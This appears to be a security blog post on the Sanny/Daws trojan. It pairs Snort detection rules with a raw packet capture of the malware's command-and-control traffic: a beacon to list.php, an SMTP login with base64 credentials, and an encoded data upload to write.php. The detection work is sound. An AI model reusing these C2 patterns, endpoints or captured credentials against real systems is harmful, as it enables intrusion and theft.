Sanny Daws Trojan Malware E-Mail Spamming Threat + Snort Signatures

By | June 18, 2015

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”ET TROJAN
> W32.Daws/Sanny CnC Initial Beacon”; flow:established,to_server;
> content:”/list.php?db=”; http_uri; content:”Accept-Language|3A| ko-kr”;
> http_header; classtype:trojan-activity; reference:url,
> blog.fireeye.com/research/2012/12/to-russia-with-apt.html; reference:url,
> contagiodump.blogspot.co.uk/2012/12/end-of-year-presents-continue.html;
> sid:1318811; rev:1;)
>
> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:”ET TROJAN
> W32.Daws/Sanny CnC POST”; flow:established,to_server; content:”POST”;
> http_method; content:”/write.php”; http_uri; content:”Accept-Language|3A|
> ko-kr”; http_header; file_data; content:”db=”; within:3; content:”&ch=”;
> distance:0; content:”&name=”; distance:0; content:”&email=”; distance:0;
> content:”&pw=”; distance:0; classtype:trojan-activity; reference:url,
> blog.fireeye.com/research/2012/12/to-russia-with-apt.html; reference:url,
> contagiodump.blogspot.co.uk/2012/12/end-of-year-presents-continue.html;
> sid:1318812; rev:1;)
>

2012-10-07 11:39:13.574688 IP 172.16.253.129.53 > 4.2.2.2.53: 26791+ A? board.nboard[.]net. (34)
E..>.d……………5.5.*..h…………board.nboard[.]net…..
2012-10-07 11:39:13.636591 IP 4.2.2.2.53 > 172.16.253.129.53: 26791 1/0/0 A 110.45.140.11 (50)
E..NA*….I……….5.5.:..h…………board.nboard[.]net……………..n-..
2012-10-07 11:39:13.638676 IP 172.16.253.129.1135 > 110.45.140.11.80: Flags [S], seq 2194421301, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0.f@…U…..n-…o.P..65….p…&………..
2012-10-07 11:39:13.880943 IP 110.45.140.11.80 > 172.16.253.129.1135: Flags [S.], seq 4214748835, ack 2194421302, win 64240, options [mss 1460], length 0
E..,A+….U.n-…….P.o.7….66`…I………
2012-10-07 11:39:13.881001 IP 172.16.253.129.1135 > 110.45.140.11.80: Flags [.], ack 1, win 64240, length 0
E..(.g@…U…..n-…o.P..66.7..P…az..
2012-10-07 11:39:13.886042 IP 172.16.253.129.1135 > 110.45.140.11.80: Flags [P.], seq 1:450, ack 1, win 64240, length 449
E….h@…S…..n-…o.P..66.7..P…A…GET /list.php?db=kbaksan_1&p=1 HTTP/1.1
Host: board.nboard[.]net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: EUC-KR,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

2012-10-07 11:39:13.886208 IP 110.45.140.11.80 > 172.16.253.129.1135: Flags [.], ack 450, win 64240, length 0
E..(A,….U.n-…….P.o.7….7.P…_………
2012-10-07 11:39:13.887021 IP 172.16.253.129.1135 > 110.45.140.11.80: Flags [F.], seq 450, ack 1, win 64240, length 0
E..(.i@…U…..n-…o.P..7..7..P…_…
2012-10-07 11:39:13.887137 IP 110.45.140.11.80 > 172.16.253.129.1135: Flags [.], ack 451, win 64239, length 0
E..(A-….U.n-…….P.o.7….7.P…_………
2012-10-07 11:39:14.779433 IP 110.45.140.11.80 > 172.16.253.129.1135: Flags [P.], seq 1:1449, ack 451, win 64239, length 1448
E…A…..P/n-…….P.o.7….7.P….@..HTTP/1.1 200 OK
Date: Mon, 17 Dec 2012 03:11:49 GMT
Server: Microsoft-IIS/5.0
P3P: CP=’CAO PSA CONi OTR OUR DEM ONL’
X-Powered-By: PHP/4.3.10
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

f01
2012-10-07 11:39:17.709515 IP 172.16.253.129.1135 > 110.45.140.11.80: Flags [.], ack 18825, win 62792, length 0
E..(.n@…U…..n-…o.P..7..8@,P..H….
2012-10-07 11:39:17.835545 IP 110.45.140.11.80 > 172.16.253.129.1135: Flags [P.], seq 18825:20273, ack 451, win 64239, length 1448
E…A>….P.n-…….P.o.8@,..7.P…Mm.. class=”nb_list_td”>2





188

 
MAI-PC_(1_7) [new]
zzzzz
2012-12-17
4





187

 
zzzzz
2012-12-17
4





186

 
MAI-PC_(1_5) [new]
zzzzz
2012-12-17
2



2012-10-07 11:41:30.928559 IP 119.161.5.253.25 > 172.16.253.129.1138: Flags [P.], seq 1:39, ack 1, win 64240, length 38
E..NA…….w……….r\…….P…”S..220 smtp108.mail.kr3.yahoo.com ESMTP

2012-10-07 11:41:30.928728 IP 172.16.253.129.1138 > 119.161.5.253.25: Flags [P.], seq 1:13, ack 39, win 64202, length 12
E..4..@………w….r……\…P…….EHLO comxp

2012-10-07 11:41:30.928869 IP 119.161.5.253.25 > 172.16.253.129.1138: Flags [.], ack 13, win 64240, length 0
E..(A…….w……….r\…….P….X……..
2012-10-07 11:41:31.175119 IP 119.161.5.253.25 > 172.16.253.129.1138: Flags [P.], seq 39:152, ack 13, win 64240, length 113
E…A……dw……….r\…….P…….250-smtp108.mail.kr3.yahoo.com
250-AUTH LOGIN PLAIN XYMCOOKIE
250-PIPELINING
250-SIZE 41697280
250 8BITMIME

2012-10-07 11:41:31.175434 IP 172.16.253.129.1138 > 119.161.5.253.25: Flags [P.], seq 13:25, ack 152, win 64089, length 12
E..4..@………w….r……\..tP..Yc…AUTH LOGIN

2012-10-07 11:41:31.175612 IP 119.161.5.253.25 > 172.16.253.129.1138: Flags [.], ack 25, win 64240, length 0
E..(A…….w……….r\..t….P………….
2012-10-07 11:41:31.395576 IP 119.161.5.253.25 > 172.16.253.129.1138: Flags [P.], seq 152:170, ack 25, win 64240, length 18
E..:A…….w……….r\..t….P…U<..334 VXNlcm5hbWU6 2012-10-07 11:41:31.395691 IP 172.16.253.129.1138 > 119.161.5.253.25: Flags [P.], seq 25:39, ack 170, win 64071, length 14
E..6..@………w….r……\…P..G.-..bWFpbGJvb3Rl

2012-10-07 11:41:31.395863 IP 119.161.5.253.25 > 172.16.253.129.1138: Flags [.], ack 39, win 64240, length 0
E..(A…….w……….r\…….P………….
2012-10-07 11:41:31.616566 IP 119.161.5.253.25 > 172.16.253.129.1138: Flags [P.], seq 170:188, ack 39, win 64240, length 18
E..:A…….w……….r\…….P…25..334 UGFzc3dvcmQ6

2012-10-07 11:41:31.616708 IP 172.16.253.129.1138 > 119.161.5.253.25: Flags [P.], seq 39:49, ack 188, win 64053, length 10
E..2..@………w….r……\…P..5….MjIzODEy

2012-10-07 11:41:31.616891 IP 119.161.5.253.25 > 172.16.253.129.1138: Flags [.], ack 49, win 64240, length 0
E..(A…….w……….r\…….P………….
2012-10-07 11:41:31.843150 IP 119.161.5.253.25 > 172.16.253.129.1138: Flags [P.], seq 188:207, ack 49, win 64240, length 19
E..;A…….w……….r\…….P…….530 Access denied

2012-10-07 11:41:31.843173 IP 119.161.5.253.25 > 172.16.253.129.1138: Flags [FP.], seq 207, ack 49, win 64240, length 0
E..(A…….w……….r\…….P………….
2012-10-07 11:41:31.843210 IP 172.16.253.129.1138 > 119.161.5.253.25: Flags [.], ack 208, win 64034, length 0
E..(..@………w….r……\…P..”.Y..
2012-10-07 11:41:31.844100 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [S], seq 4229423237, win 64240, options [mss 1460,nop,nop,sackOK], length 0
E..0..@…UG….n-…s.P……..p……………
2012-10-07 11:41:32.096260 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [S.], seq 1970311099, ack 4229423238, win 64240, options [mss 1460], length 0
E..,A…..U/n-…….P.sup……`………….
2012-10-07 11:41:32.096295 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], ack 1, win 64240, length 0
E..(..@…UN….n-…s.P….up..P…*…
2012-10-07 11:41:32.096731 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], seq 1:1461, ack 1, win 64240, length 1460
E…..@…O…..n-…s.P….up..P…4…POST /write.php HTTP/1.1
Host: board.nboard[.]net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: EUC-KR,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://board.nboard[.]net/form.php?db=kbaksan_1
Content-Type: application/x-www-form-urlencoded
Content-Length: 11328

db=kbaksan_1&ch=19&name=zz.|zzz&email=&pw=1917qaz&ulink=&title=DELLXT_(1_0)&e5=0&e6=&e7=&html=2&text=fndpoGJ-20qusEywTfAGFPaS==7x/=VWTuZo0NV=5qCXuuW9pKqhtZMjsXwDl5YR-J9a8zoVl9sWBdO=G9gpGi6i2w6=RoEiGyruq-QPPtl=jN9PqZ4JKKj7Qpd0unx/lf54L8nQAdJxllllllllllll8c23/8hWzcDq2W6iUW8FnjJbtDMpJPa76/Sfi2GsXWDoPhE5W23S0TsgbRT2wJQuFsmgeEe3hJZauZFc5VNDwHKjpmQGJEW0P0/Ld06icEizlKtK/a8CmD9CMENnE32ZT6Jfk2c48LNeGxQXb4tclUk/mZ6KrP=agC1WLA8ZP5LUP6kkubrOTaWJPV8UYEgsRAuM/NXXTFaaJNtbzLQms6X9WkMLDwIKOp/6S0hg3ExwWN/lllhTlbopYROMqzleZNJ0lGBjnPuOV6lZrS3BBShA67hak7l6W/zyhuBx87cQbspc-hb8UGbVzDZm7nXgDQyrroiM/nnon01lVgT4hixu6xotqTtxSY8BqIK/GRp4J0kRKpNaLF0Z9JSDiIOwV3OeRUz8q5ufcXiAPJfoX5BnNZn4umN70G8iDy73NpZlS8kwdDeRCC1x4thca3rkspme0aJ1ecMkFPEhlgxc3RA1IKRX6LYotku9SeELeLYEVPREb/PxTuDGsrFxyP0m5NISQSF4i4TqbgH1TF8APy0jzYu2FBisoIFXthe3EKx-AnQ8sVtDTml8obFuXUDQMCVRDE-G4e3hL48m0RCnite8pHuPQpb=bzAecMq/0frrJkedes0LciK-dQo3AIWTEalN
2012-10-07 11:41:32.096817 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], seq 1461:2921, ack 1, win 64240, length 1460
E…..@…O…..n-…s.P…:up..P….~..LYuchNjAtesVpWL-bQ9NfznaGAdgjKsIcPbx1cgnkA=9I9MHFgCIQqRM1qdTmKHStC9cDtCoQoSINoJFD4iOrtOYl84FtnYpZXG34neRKJpnCocaapyAtyQgQwuGl8TU6wiD3zIHuYrKVyRKI/7x6AW=yrX/s4ipZk0qTNhoi-fnGcjr=qo-STM–lPMc/0ypJtai=4Fu2ypcfR9pYxcIqNeCBVJKb5X4ebe1H9MjaY-z=88tyniZHp3BSf4/sS=JQhgTjx5Qtety5xpJF/hOnAOb6LYjtB9LjEI7BLtedE1f6U6ymRyttEKmgyac19fOkkmIWZiKiIli/34Kl-06db9FRxcijMCCdgjnMxH78dx61tlChRPBniRKJcDsqrScVY6PVxW-NjjHNV1gVOKbCR0xXBRzdUn0mUiS4XZga2ZjJNqy-ecn6-McthpHbN2KxWecjd=2m3Oq14iO5OhUISkMJ6DuE4HZVWLQ48cuPiO=64E2wEOrp3lllldFcN0FOdlLrqEVue5ouWdNi6f–rstjosUesd=on-4DB-0rM3ZHenCa6gkPOL=0SbIlRkCbqcF6GHGnkDM4gMrWTEAu4J=42Q-3N-dFhk=OUO5t2OwHi-xQn-ng-WynUZ7r-fKnYfXYSfFQ-LukQt9jXrQLPInE6t-cnop6UmS7HcIlyJ4W8s37iRCjZm09WCjOdG97wY54dAuaH8hVF4OMEUQG4-Da-5=qJO3Tyk60ykiQlleNskPbCFwhTsXQ3hiy97RJwei=79ZFeVMJXRHFpDnwcnjGLBVJiMnVbC2Ca5w=niPePCO1VAKH0u9kcjorlfMpjf-8/wfdSWAtSjC/p6k7eLcCi/ZESGT-YniNgxkUHuQjlPn-7G0offZ4S/ybEA5Ru//XZKsIffOx2wuYkr0bQ=xofs6teBR7rUGF7caU5uVEpQdiAA=lJ1uj5ollllMa5pSlllllMlDPAKQrxGyBHXXl31qxb0im60AfYdm7SlMCeGlY7H2qN4VqGpKZj9knsxgmRXeN5EPDrDJSiTV=BcuzXouz8hP=ml-6IuYRkn3kR0B1x7oPKUsF/8yZzBThFIuDs1o7tN6YNuT2m=LUWXYFRmASCfFzmJ6zFl=PNecNfOEoNXOiyOL=9xgEya=C/uD/=d2xe435jx6qwXJEVOP/gfBq53R12CktrTK3sNDfdHof=SBNjCUseO39st1i9MRjpHQmh0tefV3llEnnbM3MzSAmBe6DUW/B8wD9l6GX2mCbFw5okJaNPSeqkMK22OWpy92lKeHJs6JIWfH=JLj7YWeYg8gZlj7VC=B3Va80CHoy7/UCIHuhRLt4AOCLtjV18-r-NDlr8EcBZfqgCXXbd3StJr6k91UETMD3toMw9Gk3J03Dzj5KrqQsxiWWJu4Y-d0sN=hMn=jCSYZACP1OdokhUnUA06Y8R/wQoSF31det91
2012-10-07 11:41:32.096862 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [.], ack 1461, win 64240, length 0
E..(A…..U2n-…….P.sup…..:P…$………
2012-10-07 11:41:32.096898 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [.], ack 2921, win 64240, length 0
E..(A…..U1n-…….P.sup……P….”……..
2012-10-07 11:41:32.096919 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], seq 2921:4381, ack 1, win 64240, length 1460
E…..@…O…..n-…s.P….up..P….G..uVEXqEuksuTpK6wFXBxY0KTp/Y6WqPsl0tW6gwytfqQNNmVn4PNS9tpJ3VIpA0EzHRbbNIMkCYFrOjX7iuDXu-UJmjiBA3WIWjQ4Tkx0qHxQb9P7z3ZmH3DUHP/NLQk4=hOD94iOgo0585ikuGDgZ/p/USi6G=P6NYBcQgrd/dB-qP84BGH3HrEGpA6iWnLwiQu6TfiMNDlgafn9K4kByr3dYp/eNpdufSLX27kZXJoeDZdQc1S8Ccj9wZ9SPhfQueLz1Q08D8W4nuHQ0RIKOzh-K=X9XonKBNQb4UzOtuUdqiMEdqHotQQRz5O5UM6VJuhT/mNwUXd3Lfnu-EFUK6jDbCSjJhz=yGVTIIx1G06S9I5ZYp/EV2J4uNxOrRMxG89Aq7jJT7=T6rpfAPI-S32/IslqbrISTeGlqcdzTigXLKRz-ug3IVxeNHnc5PHHcIzmcRk102YX1ZOPbQKukq7-MPH5grW798ii7jYcCP08/KfzFdA4qas73jezyLA6AoF3z3G3kYIlx6LI6RG3wh9lBHY5F=WZB7j98fW9c7p/gHIOxZAF/K2nmu8fq3m7cqcrUUKh7t0k/6n86PixT/j8daQRBFfGNITuJn/iNysoA0BF=M5p-O0sg6sIR6OxMShj0=p4-6B-QSSou=nZyMqq1SPu3=RdU1EALmLZ6G1cQ68j3ahdaOBqxhxju45ZVjaHHoMIGbCB7p2WIblaHlprWzpL67mG8ySbiGHU9x9nePLcekDBqCTs=hu=4N4fihAqQqxnOhFmt4uywwxdth/gAnlABF7cuqXn9eXuBrrW2SX5BeCJ2rTawasE1BNAydbJXuZ889xc6=dhPrs15gN3pt/LRrh4C0w29OEMoNncwsHDBQmVAaPrKaZBxh24R/hL0pbyL5WZf/3N=IjzF900zD3AcR8MC2c/dqAYMw-7CfOhAhip3=oIP9KhXzhb3lBHkkChepAq8MkjPGPps-ejdsUfdYw=xGUTtQ=s4nJ4hZInT-k7kD04ZoI0Wz7dutz/-yeNVqrx-R=MyOFl2LEsrwIu9RJX1P7CacPakLZ49FV0HWwnTqR700qYyxy5ELKxECIdJhzzJUWb6mTXpW/gxeqbAM6hmdOzCmAVqdnMHsJg9hz2AIeT/cJ6hfzpU/8DwoQRQGwCWEZo-Qigw9QpT3mepjP7w4xHGCNue96n/zZ=ZiM=dqI=foqX01O7SQOzRq3ZHubCWrFl/sJd8GqH8uVz5APzlF36GoRYjcG-RjkYrpZdr6r3NUA2nA=Q9tK2NUj7DteKThwZ0ErbFi6DWG44otikCm26sMVWm9tuSDKE3Tw9mROlzoa3ysdANcUz93t0S9qpJ2m6EyHwYU-3GCSfP5MOwIkM74y8Jr2ai9r4M7waOmfj9lTuCJIyJUVINaScha9CtBfxKbjdVWp5sYkm1iriUFhrdNiZ2t4ZZ=aQeZM=
2012-10-07 11:41:32.096967 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], seq 4381:5841, ack 1, win 64240, length 1460
E…..@…O…..n-…s.P….up..P…….S8H5OT2XpngwquiRpVRyBicO-3EqVOOTMKT51n5wL8PY2qhHIh1X=MOoTOMI=IUFMtohbxe3Q6b=EoJQI9ZUy6VLTZBUM77BfWIfK3=PhF8Qc86XnW4/OGgzIJhSMZAdwlPApmqb1Eno14WzezWGZ9dfhO3u=xCBu20SlFqkS4IZA5YluOtLddcCxVrEQLil/zzm3wBHS1aVFH6rVTbcw9ydX3CXRXgG/0JsHJbTZl9GlaFOkfa/B9PR5E55xNbix-xWiDUEeFc0U=FGSPPj-LLRfm7ZQnum6A0G0rX/TQP-QykpkPcRJStql=U01CmsFCeTyAReYzVqg6Ld1UgL2FHlJPmbCr2u0MitsbJl3GFfMigIFdasWCuxoDG4XAt3KgM3n5yqV9RX8ZKDbw1BO8VJ66on7y04YSCxdHfwn6gTtNkSsaLdxwsitcSxqouXCh11Y77cuFL3hbQXu52IDN16idMZH91Aq0M8E6-r1MyuClOMO7Qp4TnfcB-u2uKsBULrKsQmkqHCdusmA/WXDcUmRBVf9B-hcqo72Ms4Kaz3a0dHASRkgRpUl9fPkD/z02DHLmX-OB81F4lqASiK3Omyn9-aj7-ixpUYJTfyJIQEta4CgVEXgD5tsgWT3V/Hf6X8XbQGlzYH=YALRNgIUGQf0DlGxBi5FtiGUmcZ1Mal4ZNpyA/QAX0m10sLtj640oo8NBoKaYJMwrUG=w3Eb4cKqy7s55AwRiFiSUNTBWJQaAZmLcyfttmPAUb7tYVqp2Qr9w=Q8u6ZUIKC2mIpT0QM4iGOpdo1BW25yRaFJguFNfHRfnOfgHw8YVj/un-W/PAqyajij25z0YTJ7IzzfKKZ8JXH-71ABMDxfixD3xUfLp=L/uL2ezOzT15xCeO8IusfR/nF2gjCBA8BhEd9gFlNK=OZRGD75NHEsgzVPtkMBwpr1x2NjXRzwi=6kgzlGVDqt6LzbxmydcwkWgNs9ZaQ5I8HM1MkGwLggKGVf5h7JYXc0dPUfxtKqP1bALcKIF5fl0Xgnft0EcJ-J/ZEaccse5OsR=7DRGU-UMQxySdQZLmXx=F-0fE7Wy-hR=JXgw3IC206B51lughE9LLtz5Zxo1A1zeTi4g/UVPmg4-Gbe=toy=M0ZeJty8Yb=5zwX6aD8dSgTgGJ-enV69woLxysiwRjDJOZ-Sfm6Ij63DJQelbfwjJS-JyMOAF7eYY8z07/bceQgPNyjLyYqKpx6i5RCJDkzeIgZ/PW6zslD4jhCB0NdOFJeBho5PWdkQ5fGil/GsfB8CVpqdcz9O==CLnJWcwilftZk=MbFhXRlYhXc6NplGV2Ge9THIPA25DHkdFU4ZZ0Yh=lLjfCJRgwBLecWMT0u1NbDzfrb1C6-gs/-4iJmjHGXIo4CJHfZXU65-nGkfaKu7KX=6ohZsTRpN29ejIYxSmdoD7jEstcidV5PwVCt3F0
2012-10-07 11:41:32.097017 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [.], ack 4381, win 64240, length 0
E..(A…..U0n-…….P.sup……P….n……..
2012-10-07 11:41:32.097074 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], seq 5841:7301, ack 1, win 64240, length 1460
E…..@…O…..n-…s.P…Vup..P…sH..yXeibYuVxXlZbZwi6O2Nc=emfj/nBc803Cam0XrMM0WtNguYJZF6hPVlsg7FhBkD=4tTuNAunX16PsoG/NOSdOMC8o3qGXXx8=3G3Mt8HFKhgndZ-6Kw/rV41V2PhocLr6xmxXcrk3zFLDQAt0-nxbKeK-NpQE4x-Zg0mFH2fNZ1KsTbZKHGsjMXUhTOqRl0kBaHAmE9Q=-ELZhqN3mYCyjVt0Lp3Kh6NzirSSZnmfQStV4R6d0-anrXEWETVjAPYZ2Vm2gGYPo3uBtXGuGJZIEYioPVGT3AaaApI/oHg9GbH7aiPZJpTE-62TGaNQpgQiT6MQ/IZ88t97/CD=VDlxesmP4koDeVknw1sh4xUHOewAK1bcJwxdu/X1LXR7q9f8XcEGSAGQgfEPNPlJqPpqjIHia8OooTKWS1OQE-VIx25uI8wJ9MQrWxgbAgzq8lrAVSJP-QbxNnYQmqRsWZL3Rjjo7AwMjMTPVlTsZYCxsjngo4C6x36EuWxtNIT1Fq=YzLTKA0jGdZrA8dMYi879YXej0KF9n1Y7I63kfKqAtNLlY4BknaAHolsILfoXTX5/I0r2IV7oJ8GMJYpjxChkJlNHJ=QB9LpecloGQzhbueOc4xaym3FB/gbmZxyo1qdmkW0sPaVLpQ3ZpLRWpnJyOZihHot/p0gMkx9KTKVa0BiXJEPzAmkCDKWZuCeioXym/87OHlY0unb9surbf8AIqSaoD3Cni7H-iTaU5Tm/PTmms9XkCkpd/JlkHNV4IG70/xCDxgh7OLYVsDxKuKxSgbHtELrG=oGNC9AwZs9/TQDEC4UOpmSP8C183eP=a9SjzHoIbq97pl3MII/nyl=4LC/5prxb2UR0QkL45Rbf/XwumlPX8pZJ6doNjN0RRhWRHVLECzpld1CZSJO6TZIEnlfthV6d-N-UU3H17ru9249=xt3LA=10QxCA8ElTzFw00p=xZeMYiSltSRorHj9nws/9do6dOL/axJakF/Rs-IBwSXiaZWs58=SeZ6/G8m9iqSt2rim8jCeNgjxB=qlynlQoflQTsr3ne4frQlej9-lWlfNu15xoyrM8ahkoXLONYtDp2ul/2ytuWgZwoGW8ug2JTIDDCDyOU-sLJW1=cKDOWCdATdS2AJ5u7T8t9/2Jfx909ygNXgy3chrP5YpJZtNAGGpMdq3Ft-YJEDA50=kAyYO97A2sGE3-/YQNLUuNO/itN1jm4HFZzH1idlBCOMWEU8rQqPSIIjn20Ur8OEWTg2wNxtwP-9jyz0hBmPUKB4FG4Fo4-1pAi55BTVVfiYOSPC0rLc4cHN3H-7R93whY5VSnrckbh3W27Z4iHlfgAS3dUZaUz08hJxkbhz0Nk0Tl8RL43iIN4h3Wg267U-KBUNLbouCULlOHtoUVUweax=Xm1BLj0TigQ5HsOpPXd0E-EJqg3lF2JJ3lVegw=oMus6yMIg
2012-10-07 11:41:32.097104 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [.], ack 5841, win 64240, length 0
E..(A…..U/n-…….P.sup…..VP………….
2012-10-07 11:41:32.097159 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], seq 7301:8761, ack 1, win 64240, length 1460
E…..@…O…..n-…s.P…
up..P….+..aG9m5MTH8sWbW11TLRKk9/WmNz5ofp7aULCQ/nB4qr1k=wD3/6iaka/gV5-PdP=w7q58zyQ9zn4DbJeCuqAYYVPzo2qgI25-89lXBlQ0QKW2oZKwMIqHhir5stUuCZ9gLTj7DB-pRAyAXyK7G0rVwH9RpTsjj9J0Wno2SQZGWKsTc9itx3xM3Wd1xOXLix8hYOs67iQmpFj-H6Bqkz54gKD4lTInr/7176hDVddfB357zX5lbjc=yVxw6enXOX8UT1mEw0zsPnQuU=EmeE1DrrPm5yMY/70UdKkXKgnIypzz/HaEuenpczyZ7PuMxUbGG9ofT42=g3m-FSi0L2Upd=L9/XHWozT8nPq/qkE=Et/i0SKwJnFp2RWWCP3i1H0kiGcO-TBW/-9S6wP12N92mloWQc4OsByLYFOAn8OQUdsWBmPGUXUMOVW1Rd9js0b2pIRlr44unb2TmL7nubCWJjRbWRUrL0VpzUz1G1ypymCNc1rzTIc8z3FpjQTUxJP7pQRjwa9MLwQXsAZtfR3-PnKcnR1tgjErRRyj2z63Cla8dxZa7y9xq70Lcdoe-xBB3FwML5SCizJS0yXa8RbMZGsg9hdC/H3OXDBjg1jRNZaRI5Qb2E/VcpfmUMw-u/HYjka6zSuO0D8NT4-5XINh3U=aMzthmluO/quLdkAV4K3-GhV1y7jmZOknSH9g/c=cG=-cs29dlVrfSn/BldIpqMwJZJKYr2MhkTOOzljZ3PwegMEYjKrTCCgbRHiW4cft9deoG7jX4e0b94qwncS-pjHhsNTg4EnktW3nEPVzToitJ4G/BBZqPy3WhAoX=FJum8HiZLii=tkPpI1wjC7nQFF=DRM=TyqJ1D3RguX8F53kQgoTUQ2L9HxooqD0gm1lH/C9DHkdzUNJy56cZHPYUIYC0FlSjuPXNu4wBzS9MsICRK8tbX=y=0ajqFY/TaMpRfuoGSsGRihr5OIwIStke/7HGbLI7ggSWf5/VVABwRUMckhIVJ39AXomIiV/xNaLKBKJXfNZxKgVUN43yhkjGF4c2BykqrNLYdog=XEidign5AZjIyPXu/68WGd0xgOXZ/SU63sNkr/eGswLbPCwArdGc2J4bfp=c/nfypy5aJEQMC0upCNE-d3ZcQk2/GX0Aps4a9MHn1Wyuk15T7/RM5DAorAcnBf15HJajM3IEwEXMKgGqiCAuBh2/B5UXSoid98aFXyd9EhrGoHgc/dfuRtFcG8EAzsjYspgVH6XDVDE4/bbN/eFXNcEq6bKewDLlzDOBPcdE=eMT8hHPWTR9h5jbOq49PmZE6UxDujMRXSTF7l=9eFrmwM88QOsOnq6KwOL52aX2MDmhhdrnxgRL90rYcAkXQ1-mO7-f769brKJUlTulsnF=n9DOq6ujeuHB5Mb39o3gzYoJ5FeWpD9oD3qHxVgyLg8nwSsEYdr/1y86NQGiQJS
2012-10-07 11:41:32.097188 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [.], ack 7301, win 64240, length 0
E..(A…..U.n-…….P.sup…..
P………….
2012-10-07 11:41:32.097262 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], seq 8761:10221, ack 1, win 64240, length 1460
E…..@…O…..n-…s.P….up..P….S..AoGcoEPWBct1gXtbyaKNutg8uRBa38RcNBoYCEu676ZeLfxotVpmN5hacNSnCbfF6gWWKq4dCA=6y389OXXbeoPh3CsTqi7EkxnH/aV9ALBkqlD9Oyss/B5niXy3UzwkBixwLIk5BY8leBRTcLgnOTAeGCPtXf6z6loH2PoF8=VgFKX-1NW4sLrV9VXhBkQQF4NmYXoNSlWLKtTtisZ3VI/jZ1y3ffLNbT1Au60IkFzNyLFU/eiL2Kl1=nJ9gjIYA2TdGcsrrcmSJYA-=AFW=08L12GUBXWF7/ryqwkcA4f0EF1TWZUa-L8SJoezsUldJL9R14WdUM300a1oNuMnd4LZr/B-19bGwGfYciOBZPY3l1pn9iYgYQtBnDOtL59OD23rruPzeZqYQ91wJMbUlCjQh6zAgDwhuYzy5jChLnLoyKrtA42UmEDhyMmeUjMVPi5Wk5PcN6qcQbqR5-qB6JWdy056uGKrNn0Nihg8TIYADOz7grBlV3rC1Nr0X1RlL-/=FCDIPN2pDtIrawCSKnyQ2LzB4yY2FsB7VCddKDmm6YxGUkZowYJp/exDl1ZzpHr=CFBIMmM0zou62GYSThD8uUtXE5EYEBeghaJeDagWZcwfhjY5oZhESOpL44SnwpCpqdpPM8zQfdV10TEzwD4pnBcQqAVcYdXota=wV6ZaiC-Ur98hX-6HEWCO7kSIzWTcsAIYh2Mz=5DYL700gqQINxo5SKDCsA27s2OW2W4SQWaReFDysozJuc2-onKFz=f0zWerQ7/QCFnMnsuifSYbifmJsZk13/e-21JeP5qoSohtDiBinaLl6zBC34axLz7lkqQxDHl2RIh3syjoy5js-HxRh1S1qMSLVIa-oAjNKEhKEwhK8oizKTIWnjFh699y7RsFcoRzzb1h1FSjBXPTaSHGTL414y/Ywb6rb5jfD0E=XF0E-H0F/NhkH2HADkt=QOA4AuSiPr3IM9ICWs5aXy4N/BpglA4xUHjludqAZB6XD-6R5-EtgRNiUagwqhypLQMAh7qN-6EhjCs0KqTxd8ps9h2H00N1VTcfohfre44fHXCaZLdU53yg9Xa6Zmj=wUg8jT4YjpC7hKpFm20MOqrxSGG/F2-6YIKI1RtWTep7AWMHcQYdga5gYSAIB/31uCWIjXz-s0oqoMJnTO-0unL/mdDs0DAZFq3g4=gQJ02feBqJaWLaFOcVDNFydul/GC21QSRM1SUS3pBiV52-IQws0qXwl/eXL1LyRsUVd7xC8WWiTNIIheSc2MAqow6Vo22ZACWrwaj-74ff7GEaHZmbb/EQscbVLfXneSJtsQ7O/EZFOxDjLZA4fW6SqsqrynSejqlwV6pM-zUJexTwwW/FyITEKohah1T73W=lJjYES2YcCHPR4x6rXo5qJMYVna4IS3Z04=6eJ/A/gVu2syfu0D3Oi5xHU4akJ=pPkgwDot3U
2012-10-07 11:41:32.097292 IP 110.45.140.11.80 > 172.16.253.129.1139: Flags [.], ack 8761, win 64240, length 0
E..(A…..U-n-…….P.sup……P….R……..
2012-10-07 11:41:32.097346 IP 172.16.253.129.1139 > 110.45.140.11.80: Flags [.], seq 10221:11681, ack 1, win 64240, length 1460
